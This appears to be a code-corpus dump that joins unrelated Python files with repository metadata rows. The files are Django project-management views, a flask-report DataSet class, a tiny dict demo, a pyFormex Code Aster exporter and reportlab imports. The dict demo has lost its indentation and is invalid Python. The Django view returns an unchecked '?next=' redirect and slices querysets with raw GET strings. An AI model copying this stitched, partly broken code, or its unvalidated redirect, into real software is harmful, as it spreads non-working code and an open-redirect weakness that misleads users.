        self.object = form.save(commit=False)
        # Same archiving trick as TaskUpdateView: new_obj aliases the freshly
        # fetched pre-edit row; clearing pk and saving inserts a version=True
        # copy holding the old values, then the edited row is saved in place.
        orig = Project.objects.get(pk=self.object.pk)
        new_obj = orig
        new_obj.pk = None
        new_obj.editor = self.request.user.profile
        new_obj.version = True
        new_obj.save()
        self.object.save()
        change_message = get_project_change_message(orig, self.object)
        LogEntry.objects.log_action(
            user_id = self.request.user.pk,
            content_type_id = ContentType.objects.get_for_model(self.object).pk,
            object_id = self.object.pk,
            object_repr = force_unicode(self.object),
            action_flag = CHANGE,
            change_message = change_message
        )
        return HttpResponseRedirect(self.get_success_url())

    def get_success_url(self):
        # Honor ?next= redirects; otherwise back to the project page.
        if self.request.GET.has_key('next'):
            messages.success(self.request, 'Successfully updated the project <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.name), extra_tags='success project-%s' % self.object.pk)
            return self.request.GET['next']
        messages.success(self.request, 'Successfully updated this project.', extra_tags='success project-%s' % self.object.pk)
        return self.object.get_absolute_url()
class ProjectListView(ListView):
    model = Project
    # NOTE: this class-level queryset is effectively superseded by
    # get_context_data, which rebuilds context['projects'] from
    # Project.originals.
    queryset = Project.objects.filter(version=False).exclude(status="Done").order_by('-status', 'start_dt')[:25]
    context_object_name = "projects"
    template_name = "proman/project_list.html"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(ProjectListView, self).dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(ProjectListView, self).get_context_data(**kwargs)
        # Default display: open (non-Done) projects.
        projects = Project.originals.exclude(status="Done").order_by('start_dt')
        context['display'] = "open"
        if self.request.GET.get('display'):
            display = self.request.GET.get('display')
            if display == "all":
                context['display'] = display
                projects = Project.originals.order_by('start_dt')
            if display == "done":
                context['display'] = display
                # NOTE(review): identical to the "all" branch -- presumably a
                # .filter(status="Done") is missing here; confirm intent.
                projects = Project.originals.order_by('start_dt')
        context['filtered_projects'] = projects
        context['projects_total'] = projects.count()
        # NOTE(review): page size kept as a *string*; it is later used as a
        # slice bound -- confirm the Django version tolerates str slice bounds.
        context['results_paginate'] = "25"
        context['technologies'] = projects.values('technology').annotate(total=Count('technology'))
        context['projects'] = projects[:context['results_paginate']]
        return context

    def render_to_response(self, context):
        """Used to pull paginated items via a GET"""
        if self.request.method == 'GET':
            # if self.request.GET.get('project_page'):
            #     project_page = self.request.GET.get('project_page')
            #     paginator = Paginator(context['filtered_projects'], context['results_paginate'])
            #     projects = paginator.page(project_page).object_list
            #     return render_to_response("proman/project_table_items.html", locals(), context_instance=RequestContext(self.request))
            if self.request.GET.get('project_search'):
                # "Load more" AJAX: skip the rows already shown.
                # NOTE(review): project_count is the raw GET string used as a
                # slice start -- confirm it is coerced/validated upstream.
                project_count = self.request.GET.get('project_search')
                current_count = self.request.GET.get('project_current')
                projects = context['filtered_projects'][project_count:]
                return render_to_response("proman/project_table_items.html", locals(), context_instance=RequestContext(self.request))
        return render_to_response(self.template_name, context, context_instance=RequestContext(self.request))
class ProjectDetailView(DetailView):
    # Project page with an inline quick-add task form and the project's
    # admin-log history.
    model = Project
    template_name = "proman/project_detail.html"
    context_object_name = "project"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(ProjectDetailView, self).dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        project = self.object.pk
        user = self.request.user
        # Quick-add task form, pre-bound to this project and the current user.
        form = TaskMiniForm()
        form.fields['owner'].initial = user.profile.id
        form.fields['project'].initial = project
        form.fields['due_dt'].initial = DUE_DT_INITIAL
        form.fields['billable'].initial = True
        context = super(ProjectDetailView, self).get_context_data(**kwargs)
        # NOTE(review): project_tasks is computed but never put in the
        # context -- either dead code or a missing context['project_tasks'].
        project_tasks = Task.objects.filter(version=False, project=self.kwargs['pk'])
        context['form'] = form
        context['project_logs'] = LogEntry.objects.filter(object_id=self.object.pk, content_type = ContentType.objects.get_for_model(self.object).pk).order_by('-action_time')
        return context
@login_required
def import_content(request, content_type=None, template_name="proman/import.html"):
    """Kick off a Harvest import of the given content type.

    Creates a ContentImport record for the current user and redirects to the
    attempt view that actually runs the import. 404s on unknown types.
    """
    allowed_types = ['clients', 'projects', 'users', 'client_contacts']
    if content_type not in allowed_types:
        raise Http404
    record = ContentImport.objects.create(content_type=content_type, starter=request.user.profile)
    kwargs = {'content_type': content_type, 'pk': int(record.pk)}
    return HttpResponseRedirect(reverse('import_content_attempt', kwargs=kwargs))
@login_required
def import_content_attempt(request, content_type=None, pk=None, template_name="proman/import.html"):
    # Run (or show) one import attempt: stamps create_dt on first visit and
    # launches the matching management command as a detached subprocess; the
    # page then polls import_check for progress.
    if content_type not in ['clients', 'projects', 'users', 'client_contacts']:
        raise Http404
    ci = get_object_or_404(ContentImport, pk=pk)
    if not ci.create_dt:
        ci.create_dt = timezone.now()
        ci.save()
    # content_type was whitelisted above, so the command name is safe; the
    # argv-list form avoids shell interpolation entirely.
    command = 'import_harvest_%s' % ci.content_type
    subprocess.Popen(["python", "manage.py", command, str(ci.pk)])
    return render_to_response(template_name, locals(), context_instance=RequestContext(request))
@login_required
def import_check(request, pk=None, template_name="proman/import_check.html"):
    """
    Check the import record for matched, added, total, and completeness.
    Also create the percentage for the bar graph. Render all of these in a hidden
    div in a template to be reformatted and displayed by javascript
    """
    if pk:
        # ROBUSTNESS FIX: cache.get returns None on a miss (e.g. while the
        # import subprocess is still warming up); default the counters to 0 so
        # the arithmetic below cannot raise.
        matched = cache.get('content_import.matched.%s' % pk) or 0
        added = cache.get('content_import.added.%s' % pk) or 0
        total = cache.get('content_import.total.%s' % pk) or 0
        # complete_dt is legitimately None until the import finishes.
        complete_dt = cache.get('content_import.complete_dt.%s' % pk)
        perc = 0
        if total > 0:
            perc = int(round((matched + added) * 100 / total))
    return render_to_response(template_name, locals(), context_instance=RequestContext(request))
UTF-8
Python
false
false
2,012
15,788,299,821,622
37417de80f0651d41ab66f5692db30fcf5ffefb0
d8ba9cce6373a4bcafff442feb1500b6b63d638c
/flask_report/data_set.py
ae18ffd8d20cd3a86075c329d9c5f2cdeb734573
[]
no_license
pbehnke/flask-report
https://github.com/pbehnke/flask-report
2b67d2c819d9539b86d18ec6b5f884b4a1c4abf0
90a038799d49825e7f88bcc82bc5e8f15c7cacb2
refs/heads/master
2021-05-28T03:32:10.223086
2014-11-20T13:41:40
2014-11-20T13:41:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: UTF-8 -*-
import os
import operator
import yaml
from import_file import import_file
from werkzeug.utils import cached_property
import sqlalchemy
from flask.ext.babel import _
from flask.ext.report.utils import get_column, get_primary_key
class DataSet(object):
    '''
    data set defines the source of data

    A DataSet is loaded from <data_set_dir>/<id_>/meta.yaml plus a
    query_def.py whose get_query(db, model_map) supplies the SQLAlchemy
    query; it exposes the query, its columns, and the configured filters.
    '''

    # Maps Python type names to HTML input widget types for filter rendering.
    __TYPES__ = {
        "str": "text",
        "int": "number",
        "bool": "checkbox",
        "datetime": "datetime",
        "date": "date"
    }

    def __init__(self, flask_report, id_):
        self.flask_report = flask_report
        self.id_ = id_
        data_set_meta_file = os.path.join(self.flask_report.data_set_dir,
                                          str(id_), 'meta.yaml')
        # NOTE(review): Python 2 file() and bare yaml.load -- yaml.load can
        # execute arbitrary tags; fine only if meta.yaml is trusted config.
        data_set_meta = yaml.load(file(data_set_meta_file).read())
        self.name = data_set_meta['name']
        self.creator = data_set_meta.get('creator')
        self.create_time = data_set_meta.get('create_time')
        self.description = data_set_meta.get("description")
        self.default_report_name = data_set_meta.get("default_report_name", '')
        # Comparison operators allowed in filter definitions.
        self.__special_chars = {"gt": operator.gt, "lt": operator.lt,
                                "ge": operator.ge, "le": operator.le,
                                "eq": operator.eq, "ne": operator.ne}
        self._filters = data_set_meta.get("filters", {})

    @cached_property
    def query(self):
        '''
        the query of data set
        '''
        query_def_file = os.path.join(self.flask_report.data_set_dir,
                                      str(self.id_), "query_def.py")
        lib = import_file(query_def_file)
        return lib.get_query(self.flask_report.db, self.flask_report.model_map)

    @cached_property
    def columns(self):
        '''
        get the columns

        :return list: a list of column, each one is a dict, contains then
            following keys:

            * idx - the index of the column, start from 0
            * name - name of the column
            * key - key of the column, eg. column name defined in table
            * expr - the column definition in model

        for example, for query like:

            db.session.query(User.id, User.name.label('username'))

        and User.__tablename__ is 'TB_USER'

        the columns will be:

            [
                {
                    idx: 0,
                    name: 'User.id',
                    key: 'TB_USER.id',
                    expr: User.id
                },
                {
                    idx: 1,
                    name: 'username',
                    key: 'TB_USER.name',
                    expr: User.name.label('username')
                },
            ]
        '''
        def _make_dict(idx, c):
            # Three shapes of column_descriptions entries: labeled columns,
            # whole model classes, and plain columns.
            if hasattr(c['expr'], 'element'):  # is label
                # NOTE(review): the fallback assigns a *dict* as the name
                # (dict(name=...)) rather than a string -- looks like a bug;
                # confirm against flask-report's rendering code.
                name = c['name'] or dict(name=str(c['expr']))
                key = str(c['expr'].element)
                if isinstance(c['expr'].element,
                              sqlalchemy.sql.expression.Function):
                    key = key.replace('"', '')
            else:
                if hasattr(c['expr'], '_sa_class_manager'):  # is a model class
                    key = c['expr'].__tablename__
                    name = c['expr'].__name__
                else:
                    name = str(c['expr'])
                    key = c['expr'].table.name + "." + c['expr'].name
            # TODO need key?
            return dict(idx=idx, name=name, key=key, expr=c['expr'])
        return tuple(_make_dict(idx, c) for idx, c in
                     enumerate(self.query.column_descriptions))

    def _search_label(self, column):
        # Find the display name recorded in self.columns for this column.
        for c in self.columns:
            if c["key"] == str(column.expression) or \
               c["expr"] == column:
                return c["name"]
        raise ValueError(_('There\'s no such column ' + str(column)))

    def _coerce_type(self, column):
        # Map the column's Python type to a widget type, defaulting to text.
        default = column.type.python_type
        return self.__TYPES__.get(default.__name__, 'text')

    @property
    def filters(self):
        '''
        a list of filters
        '''
        filters = []
        for k, v in self._filters.items():
            column = get_column(k, self.columns, self.flask_report)
            result = {
                "name": v.get('name', self._search_label(column)),
                "col": k,
                "ops": v.get("operators"),
                'opts': [],
                'synthetic': False,
            }
            # Relationship columns become select widgets whose options are
            # every row of the related model (pk, unicode label).
            if hasattr(column, "property") and hasattr(column.property,
                                                       "direction"):
                model = column.property.mapper.class_
                pk = get_primary_key(model)

                def _iter_choices(column):
                    for row in self.flask_report.db.session.query(model):
                        yield getattr(row, pk), unicode(row)
                remote_side = column.property.local_remote_pairs[0][0]
                result["opts"] = list(_iter_choices(column))
                result['type'] = v.get('type',
                                       self._coerce_type(remote_side))
            else:
                result['type'] = v.get('type', self._coerce_type(column))
            filters.append(result)
        # Append user-defined (synthetic) filters after the column filters.
        for k, f in self.synthetic_filter_map.items():
            filters.append({
                'name': f.name,
                'col': f.name,
                'ops': f.operators,
                'type': f.type,
                'opts': f.options,
                'synthetic': True,
            })
        return filters

    @property
    def synthetic_filter_map(self):
        '''
        a map of synthetic (user defined) filters, keys are filters'name, values
        are filters
        '''
        synthetic_filter_file = os.path.join(self.dir, 'synthetic_filters.py')
        ret = {}
        if os.path.exists(synthetic_filter_file):
            lib = import_file(synthetic_filter_file)
            for filter_ in lib.__all__:
                ret[filter_.name] = filter_
        return ret

    @property
    def dir(self):
        '''
        the path of the directory where data set is defined
        '''
        return os.path.join(self.flask_report.data_set_dir, str(self.id_))

    def get_current_filters(self, currents):
        # TODO what is this method for?
        # Merge each "current" filter dict with the full definition from
        # self.filters (matched by column), coercing values to int when
        # possible.
        def _match(to_matcher):
            result = to_matcher.copy()
            for filter in self.filters:
                if to_matcher["col"] == filter["col"]:
                    result.update(filter)
            return result
        all = []
        for current in currents:
            filter_ = _match(current)
            if filter_:
                try:
                    filter_["val"] = int(filter_["val"])
                except ValueError:
                    pass
                all.append(filter_)
        return all
#!/usr/bin/env python
#! coding: utf-8
dict = {"a" : "apple", "b" : "banana", "g" : "grape", "o" : "orange"}
print dict
dict["w"] = "watermelon"
print dict
del(dict["a"])
print dict
#字典遍历
for k in dict:
print "dict[%s] =" % k,dict[k]
#每个元素是一个key和value组成的元组,以列表的方式输出
print dict.items()
#调用items()实现字典的遍历
for (k, v) in dict.items():
print "dict[%s] =" % k, v
#输出key的列表
print dict.keys()
#输出value的列表
print dict.values()
UTF-8
Python
false
false
2,013
16,870,631,557,461
d570df1637b6d4da2395fd6cf3bac7176d310277
76de4fc4f00a04c8c9acc1e9e4a5fae12cf0c08a
/trunk/pyformex/plugins/fe_ast.py
6ffdd88d84c6104ce26a4efaf8facc192b45daa0
[]
no_license
BackupTheBerlios/pyformex-svn
https://github.com/BackupTheBerlios/pyformex-svn
ec2361b1b9967918be65e892217a691a6f8b145d
f5404809095711334bbb938d9d119a69ad8fc260
refs/heads/master
2020-12-24T13:20:47.422165
2011-11-15T11:52:23
2011-11-15T11:52:23
40,749,266
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env pyformex
##
## This file is part of pyFormex 0.8.5 Sun Nov 6 17:27:05 CET 2011
## pyFormex is a tool for generating, manipulating and transforming 3D
## geometrical models by sequences of mathematical operations.
## Home page: http://pyformex.org
## Project page: https://savannah.nongnu.org/projects/pyformex/
## Copyright (C) Benedict Verhegghe ([email protected])
## Distributed under the GNU General Public License version 3 or later.
##
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see http://www.gnu.org/licenses/.
##
"""Exporting finite element models in code Aster file formats (.mail and .comm).
"""
from plugins.fe_abq import fmtData
from plugins.properties import *
from plugins.fe import *
from mydict import Dict,CDict
import pyformex as pf
from datetime import datetime
import os,sys
def astInputNames(job,extension='mail'):
    """Returns corresponding Code Aster input filename.

    job should be a jobname, with or without directory part, but without extension

    The extension can be mail or comm.

    The jobname is the basename without the extension and the directory part.
    The filename is the abspath of the job with extension.

    Raises ValueError for any other extension.
    """
    jobname = os.path.basename(job)
    filename = os.path.abspath(job)
    if extension in ['mail','comm']:
        filename += '.%s' % extension
    else:
        # FIX: call-style raise, valid in both Python 2 and 3 (the old
        # `raise ValueError,"..."` statement form is Python-2-only).
        raise ValueError("Extension should be mail or comm")
    return jobname,filename
def nsetName(p):
    """Return the name under which a node set property is written,
    defaulting to 'Nall' when the property has no name."""
    return 'Nall' if p.name is None else p.name
def esetName(p):
    """Return the name under which an element set property is written,
    defaulting to 'Eall' when the property has no name."""
    return 'Eall' if p.name is None else p.name
def writeNodes(fil,nodes,type,name=None):
    """Write nodal coordinates.

    Type can be 2D or 3D ('2D' keeps only the first two coordinate columns).
    `fil` is a writable file-like object; `nodes` an (nnodes, ndim) array.
    `name` optionally names the COOR group. Raises ValueError on other types.
    (`type` shadows the builtin; kept for interface compatibility.)
    """
    if not type in ['2D','3D']:
        # FIX: call-style raise, valid in both Python 2 and 3.
        raise ValueError("Type should be 2D or 3D")
    out = 'COOR_%s' % type
    if name is not None:
        out += ' nom = %s' % name
    fil.write('%s\n'% out)
    if type == '2D':
        nodes = nodes[:,:2]
    nn = nodes.shape[1]
    # One record per node: N<index> followed by nn coordinates.
    fmt = 'N%d' + nn*' %14.6e' + '\n'
    for i,n in enumerate(nodes):
        fil.write(fmt % ((i,)+tuple(n)))
    fil.write('FINSF\n')
    fil.write('%\n')
def writeElems(fil,elems,type,name=None,eid=None,eofs=0,nofs=0):
    """Write element group of given type.

    elems is the list with the element node numbers.
    The elements are added to the named element set.
    The eofs and nofs specify offsets for element and node numbers.
    If eid is specified, it contains the element numbers increased with eofs.
    """
    out = type
    if name is not None:
        out += ' nom = %s' % name
    fil.write('%s\n'% out)
    nn = elems.shape[1]
    # Records with more than 4 nodes are wrapped 4 per line.
    # NOTE: nn/4 relies on Python 2 integer division (would need // on py3).
    if nn < 5:
        fmt = 'M%d' + nn*' N%d' + '\n'
    else:
        fl = nn/4
        fmt = 'M%d' + fl*(4*' N%d' + '\n')
        if nn%4 != 0:
            fmt += (nn%4)*' N%d' + '\n'
    if eid is None:
        eid = arange(elems.shape[0])
    else:
        eid = asarray(eid)
    # Element and node numbers are shifted by the requested offsets.
    for i,e in zip(eid+eofs,elems+nofs):
        fil.write(fmt % ((i,)+tuple(e)))
    fil.write('FINSF\n')
    fil.write('%\n')
def writeSet(fil,type,name,set):
    """Write a named set of nodes or elements (type=NSET|ELSET)

    `set` is a list of node/element numbers; members are written one per
    line prefixed with N (nodes) or M (elements). Raises ValueError for any
    other type. (`type`/`set` shadow builtins; kept for compatibility.)
    """
    if type == 'NSET':
        fil.write('GROUP_NO nom = %s\n' % name)
        cap = 'N'
    elif type == 'ELSET':
        fil.write('GROUP_MA nom = %s\n' % name)
        cap = 'M'
    else:
        # FIX: call-style raise, valid in both Python 2 and 3.
        raise ValueError("Type should be NSET or ELSET")
    for i in set:
        fil.write('%s%d\n' % (cap,i))
    fil.write('FINSF\n')
    fil.write('%\n')
def fmtHeadingMesh(text=''):
    """Format the heading of the Code Aster mesh file (.mail).

    `text` is extra free-form heading text appended after the generator line.
    """
    out = """TITRE
Code Aster mail file created by %s (%s)
%s
FINSF
""" % (pf.Version,pf.Url,text)
    return out
def fmtHeadingComm(text=''):
    """Format the heading of the Code Aster command file (.comm).

    `text` is extra free-form heading text appended after the generator line.
    """
    out = """#
# Code Aster command file created by %s (%s)
# %s
""" % (pf.Version,pf.Url,text)
    return out
def fmtEquation(prop):
    """Format multi-point constraint using an equation

    Required:
    - name
    - equation

    Optional:
    - coefficient

    Equation should be a list, which contains the different terms of the equation.
    Each term is again a list with three values:

    - First value: node number
    - Second value: degree of freedom
    - Third value: multiplication coefficient of the term

    The sum of the different terms should be equal to the coefficient.
    If this coefficient is not specified, the sum of the terms should be equal to zero.

    Example: P.nodeProp(equation=[[209,1,1],[32,1,-1]])

    In this case, the displacement in Y-direction of node 209 and 32 should be equal.
    """
    dof = ['DX','DY','DZ']
    out = 'link = AFFE_CHAR_MECA(\n'
    out += '    MODELE=Model,\n'
    out += '    LIAISON_DDL=(\n'
    for i,p in enumerate(prop):
        # Build the three parallel tuples (nodes, dofs, multipliers) for
        # this equation's terms.
        l1 = '        _F(NOEUD=('
        l2 = '           DDL=('
        l3 = '           COEF_MULT=('
        for j in p.equation:
            l1 += '\'N%s\',' % j[0]
            l2 += '\'%s\',' % dof[j[1]]
            l3 += '%s,' % j[2]
        out += l1 + '),\n' + l2 + '),\n' + l3 + '),\n'
        # A missing coefficient means the terms must sum to zero.
        coef = 0
        if p.coefficient is not None:
            coef = p.coefficient
        out += '           COEF_IMPO=%s,),\n' % coef
    out += '        ),\n'
    out += '    );\n\n'
    return out
def fmtDisplacements(prop):
    """Format nodal boundary conditions

    Required:
    - set
    - name
    - displ

    Displ should be a list of tuples (dofid,value)
    Set can be a list of node numbers, or a set name (string).

    Example 1: P.nodeProp(set='bottom',bound=[(0,0),(1,0),(2,0)])
    Example 2: P.nodeProp(name='rot',set=[2],bound=[(3,30)])

    In the first example, the displacements of the nodes in the set 'bottom' are zero.
    In the second example, a rotation is imposed around the X-axis on node number 2.
    """
    dof = ['DX','DY','DZ','DRX','DRY','DRZ']
    out = ''
    # One displ<i> AFFE_CHAR_MECA block per property record.
    for i,p in enumerate(prop):
        out += 'displ%s = AFFE_CHAR_MECA(\n' % i
        out += '    MODELE=Model,\n'
        out += '    DDL_IMPO=\n'
        out += '        _F(GROUP_NO=(\'%s\'),\n' % p.name.upper()
        for j in p.displ:
            # (dofid, value) -> e.g. DY=0
            out += '           %s=%s,\n' % (dof[j[0]],j[1])
        out += '        ),\n'
        out += '    );\n\n'
    return out
def fmtLocalDisplacements(prop):
    """Format nodal boundary conditions in a local coordinate system

    Required:
    - name
    - displ
    - local

    Displ should be a list of tuples (dofid,value)
    Local is an angle, specified in degrees (SHOULD BE EXTENDED TO THREE ANGLES!!!)
    The local cartesian coordinate system is obtained by rotating the global
    coordinate system around the Z-axis over the specified angle.
    Set can be a list of node numbers, or a set name (string).
    """
    dof = ['DX','DY','DZ','DRX','DRY','DRZ']
    # All records share one AFFE_CHAR_MECA block; one _F entry per dof.
    out = 'locDispl = AFFE_CHAR_MECA(\n'
    out += '    MODELE=Model,\n'
    out += '    LIAISON_OBLIQUE=(\n'
    for i,p in enumerate(prop):
        for j in p.displ:
            out += '        _F(GROUP_NO=(\'%s\'),\n' % p.name.upper()
            out += '           ANGL_NAUT=%s,\n' % p.local
            out += '           %s=%s),\n' % (dof[j[0]],j[1])
    out += '        ),\n'
    out += '    );\n\n'
    return out
# Names of materials already emitted; reset by AstData.writeComm so each
# command file defines each material exactly once.
materialswritten=[]

def fmtMaterial(mat):
    """Write a material section.

    Emits a DEFI_MATERIAU block for `mat` the first time its name is seen;
    repeated calls for the same material (or an unnamed one) return ''.
    Linear elasticity is assumed when mat.elasticity is None/'linear'; a
    missing poisson_ratio is derived from the shear modulus. Optional
    2-D plastic data adds a DEFI_FONCTION/TRACTION section.
    """
    if mat.name is None or mat.name in materialswritten:
        return ""
    out = '%s = DEFI_MATERIAU(\n' % mat.name
    materialswritten.append(mat.name)
    # FIX: dropped a leftover `print materialswritten` debug statement.
    if mat.elasticity is None or mat.elasticity == 'linear':
        if mat.poisson_ratio is None and mat.shear_modulus is not None:
            # nu = E / (2G) - 1
            mat.poisson_ratio = 0.5 * mat.young_modulus / mat.shear_modulus - 1.0
        out += '    ELAS=_F(E=%s,NU=%s),\n' % (float(mat.young_modulus),float(mat.poisson_ratio))
    if mat.plastic is not None:
        mat.plastic = asarray(mat.plastic)
        if mat.plastic.ndim != 2:
            # FIX: call-style raise, valid in both Python 2 and 3.
            raise ValueError("Plastic data should be 2-dim array")
        # The stress-strain curve is emitted first, then referenced by name.
        out1 = 'SIGMF=DEFI_FONCTION(\n'
        out1 += '    NOM_PARA=\'EPSI\',\n'
        out1 += '    VALE=(\n'
        for i in mat.plastic:
            out1 += '        %s,%s,\n' % (i[0],i[1])
        out1 += '        ),\n'
        out1 += '    );\n\n'
        out += '    TRACTION=_F(SIGM=SIGMF,),\n'
        out = out1 + out
    out += '    );\n\n'
    return out
# Element type names handled as 3-D solid elements.
solid3d_elems = [
    'HEXA8',]

def fmtSections(prop):
    """Write element sections.

    prop is an element property record with a section and eltype attribute.
    Builds three concatenated outputs: the AFFE_MODELE block (out1), the
    material definitions (out2, via fmtMaterial), and the AFFE_MATERIAU
    block (out3).
    """
    out1 = 'Model=AFFE_MODELE(\n'
    out1 += '    MAILLAGE=Mesh,\n'
    out1 += '    AFFE=(\n'
    out2 = ''
    out3 = 'Mat=AFFE_MATERIAU(\n'
    out3 += '    MODELE=Model,\n'
    out3 += '    MAILLAGE=Mesh,\n'
    out3 += '    AFFE=(\n'
    for p in prop:
        setname = esetName(p)
        el = p.section
        eltype = p.eltype.upper()
        mat = el.material
        out1 += '        _F(GROUP_MA=\'%s\',\n' % setname.upper()
        out1 += '           PHENOMENE=\'MECANIQUE\',\n'
        out3 += '        _F(GROUP_MA=\'%s\',\n' % setname.upper()
        if mat is not None:
            # Each distinct material is defined once (fmtMaterial dedups).
            out2 += fmtMaterial(mat)
        ############
        ## 3DSOLID elements
        ##########################
        if eltype in solid3d_elems:
            if el.sectiontype.upper() == '3DSOLID':
                out1 += '           MODELISATION=\'3D\'),\n'
                out3 += '           MATER=%s),\n' % mat.name
    out1 += '        ),\n'
    out1 += '    );\n\n'
    out3 += '        ),\n'
    out3 += '    );\n\n'
    return out1 + out2 + out3
class AstData(object):
    """Contains all data required to write the Code Aster mesh (.mail) and command (.comm) files.

    - `model` : a :class:`Model` instance.
    - `prop` : the `Property` database.
    - `steps` : a list of `Step` instances.
    - `res` : a list of `Result` instances.
    - `out` : a list of `Output` instances.
    - `bound` : a tag or alist of the initial boundary conditions.
      The default is to apply ALL boundary conditions initially.
      Specify a (possibly non-existing) tag to override the default.
    """

    def __init__(self,model,prop,nprop=None,eprop=None,steps=[],res=[],out=[],bound=None,type='3D'):
        """Create new AstData."""
        # NOTE: keeps the file's Python 2 raise syntax; `type` shadows the
        # builtin but is part of the established interface.
        if not isinstance(model,Model) or not isinstance(prop,PropertyDB):
            raise ValueError,"Invalid arguments: expected Model and PropertyDB, got %s and %s" % (type(model),type(prop))
        self.model = model
        self.prop = prop
        self.nprop = nprop
        self.eprop = eprop
        self.bound = bound
        self.steps = steps
        self.res = res
        self.out = out
        self.type = type

    def writeMesh(self,jobname=None,header=''):
        """Write a Code Aster mesh file (.mail).

        Without a jobname the mesh is written to stdout. Emits the heading,
        nodal coordinates, element groups + element sets, node sets, and a
        closing FIN.
        """
        # Create the Code Aster mesh file
        if jobname is None:
            jobname,filename = 'Test',None
            fil = sys.stdout
        else:
            jobname,filename = astInputNames(jobname,extension='mail')
            fil = file(filename,'w')
            pf.message("Writing mesh to file %s" % (filename))

        fil.write(fmtHeadingMesh("""Model: %s     Date: %s      Created by pyFormex
Script: %s
%s
""" % (jobname, datetime.now(), pf.scriptName, header)))

        # write coords
        nnod = self.model.nnodes()
        pf.message("Writing %s nodes" % nnod)
        writeNodes(fil,self.model.coords,self.type)

        # write elements
        pf.message("Writing elements and element sets")
        telems = self.model.celems[-1]
        nelems = 0
        for p in self.prop.getProp('e'):
            # Resolve the element set: explicit list, eprop match, or all.
            if p.set is not None:
                # element set is directly specified
                set = p.set
            elif p.prop is not None:
                # element set is specified by eprop nrs
                if self.eprop is None:
                    raise ValueError,"elemProp has a 'prop' field but no 'eprop' was specified"
                set = where(self.eprop == p.prop)[0]
            else:
                # default is all elements
                set = range(telems)
            setname = esetName(p)

            if p.has_key('eltype'):
                print('Writing elements of type %s: %s' % (p.eltype,set))
                # Gather the (possibly multi-group) elements into one array.
                gl,gr = self.model.splitElems(set)
                elems = self.model.getElems(gr)
                elnrs = array([]).astype(int)
                els = array([]).astype(int)
                for i in elems:
                    nels = len(i)
                    if nels > 0:
                        els = append(els,i).reshape(-1,i.shape[1])
                        nelems += nels
                writeElems(fil,els,p.eltype,name=setname,eid=set)
                pf.message("Writing element sets")
                writeSet(fil,'ELSET',setname,set)

        pf.message("Total number of elements: %s" % telems)
        if nelems != telems:
            pf.message("!! Number of elements written: %s !!" % nelems)

        # write node sets
        pf.message("Writing node sets")
        for p in self.prop.getProp('n',attr=['set']):
            # Same resolution logic as above, for node numbers.
            if p.set is not None:
                # set is directly specified
                set = p.set
            elif p.prop is not None:
                # set is specified by nprop nrs
                if self.nprop is None:
                    raise ValueError,"nodeProp has a 'prop' field but no 'nprop' was specified"
                set = where(self.nprop == p.prop)[0]
            else:
                # default is all nodes
                set = range(self.model.nnodes())
            setname = nsetName(p)
            writeSet(fil,'NSET',setname,set)

##        # write element sets
##        pf.message("Writing element sets")
##        for p in self.prop.getProp('e',noattr=['eltype']):
##            if p.set is not None:
##                # element set is directly specified
##                set = p.set
##            elif p.prop is not None:
##                # element set is specified by eprop nrs
##                if self.eprop is None:
##                    raise ValueError,"elemProp has a 'prop' field but no 'eprop' was specified"
##                set = where(self.eprop == p.prop)[0]
##            else:
##                # default is all elements
##                set = range(telems)
##            setname = esetName(p)
##            writeSet(fil,'ELSET',setname,set)

        fil.write('FIN')
        if filename is not None:
            fil.close()
        pf.message("Wrote Code Aster mesh file (.mail) %s" % filename)

    def writeComm(self,jobname=None,header=''):
        """Write a Code Aster command file (.comm).

        Without a jobname the commands are written to stdout. Emits DEBUT,
        mesh loading, sections, (local) displacement BCs, constraint
        equations, and FIN.
        """
        # Reset the per-file material dedup list used by fmtMaterial.
        global materialswritten
        materialswritten = []

        # Create the Code Aster command file
        if jobname is None:
            jobname,filename = 'Test',None
            fil = sys.stdout
        else:
            jobname,filename = astInputNames(jobname,extension='comm')
            fil = file(filename,'w')
            pf.message("Writing command to file %s" % (filename))

        fil.write(fmtHeadingComm("""Model: %s     Date: %s      Created by pyFormex
# Script: %s
# %s
#
""" % (jobname, datetime.now(), pf.scriptName, header)))

        fil.write('DEBUT();\n\n')
        fil.write('Mesh=LIRE_MAILLAGE(INFO=2,);\n\n')

        prop = self.prop.getProp('e',attr=['section','eltype'])
        if prop:
            pf.message("Writing element sections")
            fil.write(fmtSections(prop))

        prop = self.prop.getProp('n',attr=['displ'],noattr=['local'])
        if prop:
            pf.message("Writing displacement boundary conditions")
            fil.write(fmtDisplacements(prop))

        prop = self.prop.getProp('n',attr=['local'])
        if prop:
            pf.message("Writing local displacement boundary conditions")
            fil.write(fmtLocalDisplacements(prop))

        prop = self.prop.getProp('n',attr=['equation'])
        if prop:
            pf.message("Writing constraint equations")
            fil.write(fmtEquation(prop))

        fil.write('FIN();\n')
        if filename is not None:
            fil.close()
        pf.message("Wrote Code Aster command file (.comm) %s" % filename)
UTF-8
Python
false
false
2,011
10,153,302,707,876
eea73743a272f1f879e2fec531ac4e255e9706c8
2b65ea4d49ea321bdcf40b7202c1382ce98ff46f
/report.py
f2b63414683caf0f7b475c9d1e6f7c8168216ed4
[]
no_license
bgnori/activity-report
https://github.com/bgnori/activity-report
572d6a76c0c3e1a452a998ae6c08603c213fed02
b99f419a610d5bbd9b34e9da51bba0072561f023
refs/heads/master
2020-05-18T06:49:15.771735
2013-01-11T02:11:14
2013-01-11T02:11:14
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python
# -*- coding: utf-8 -*-
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import mm
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.styles import ParagraphStyle
from reportlab.rl_config import defaultPageSize
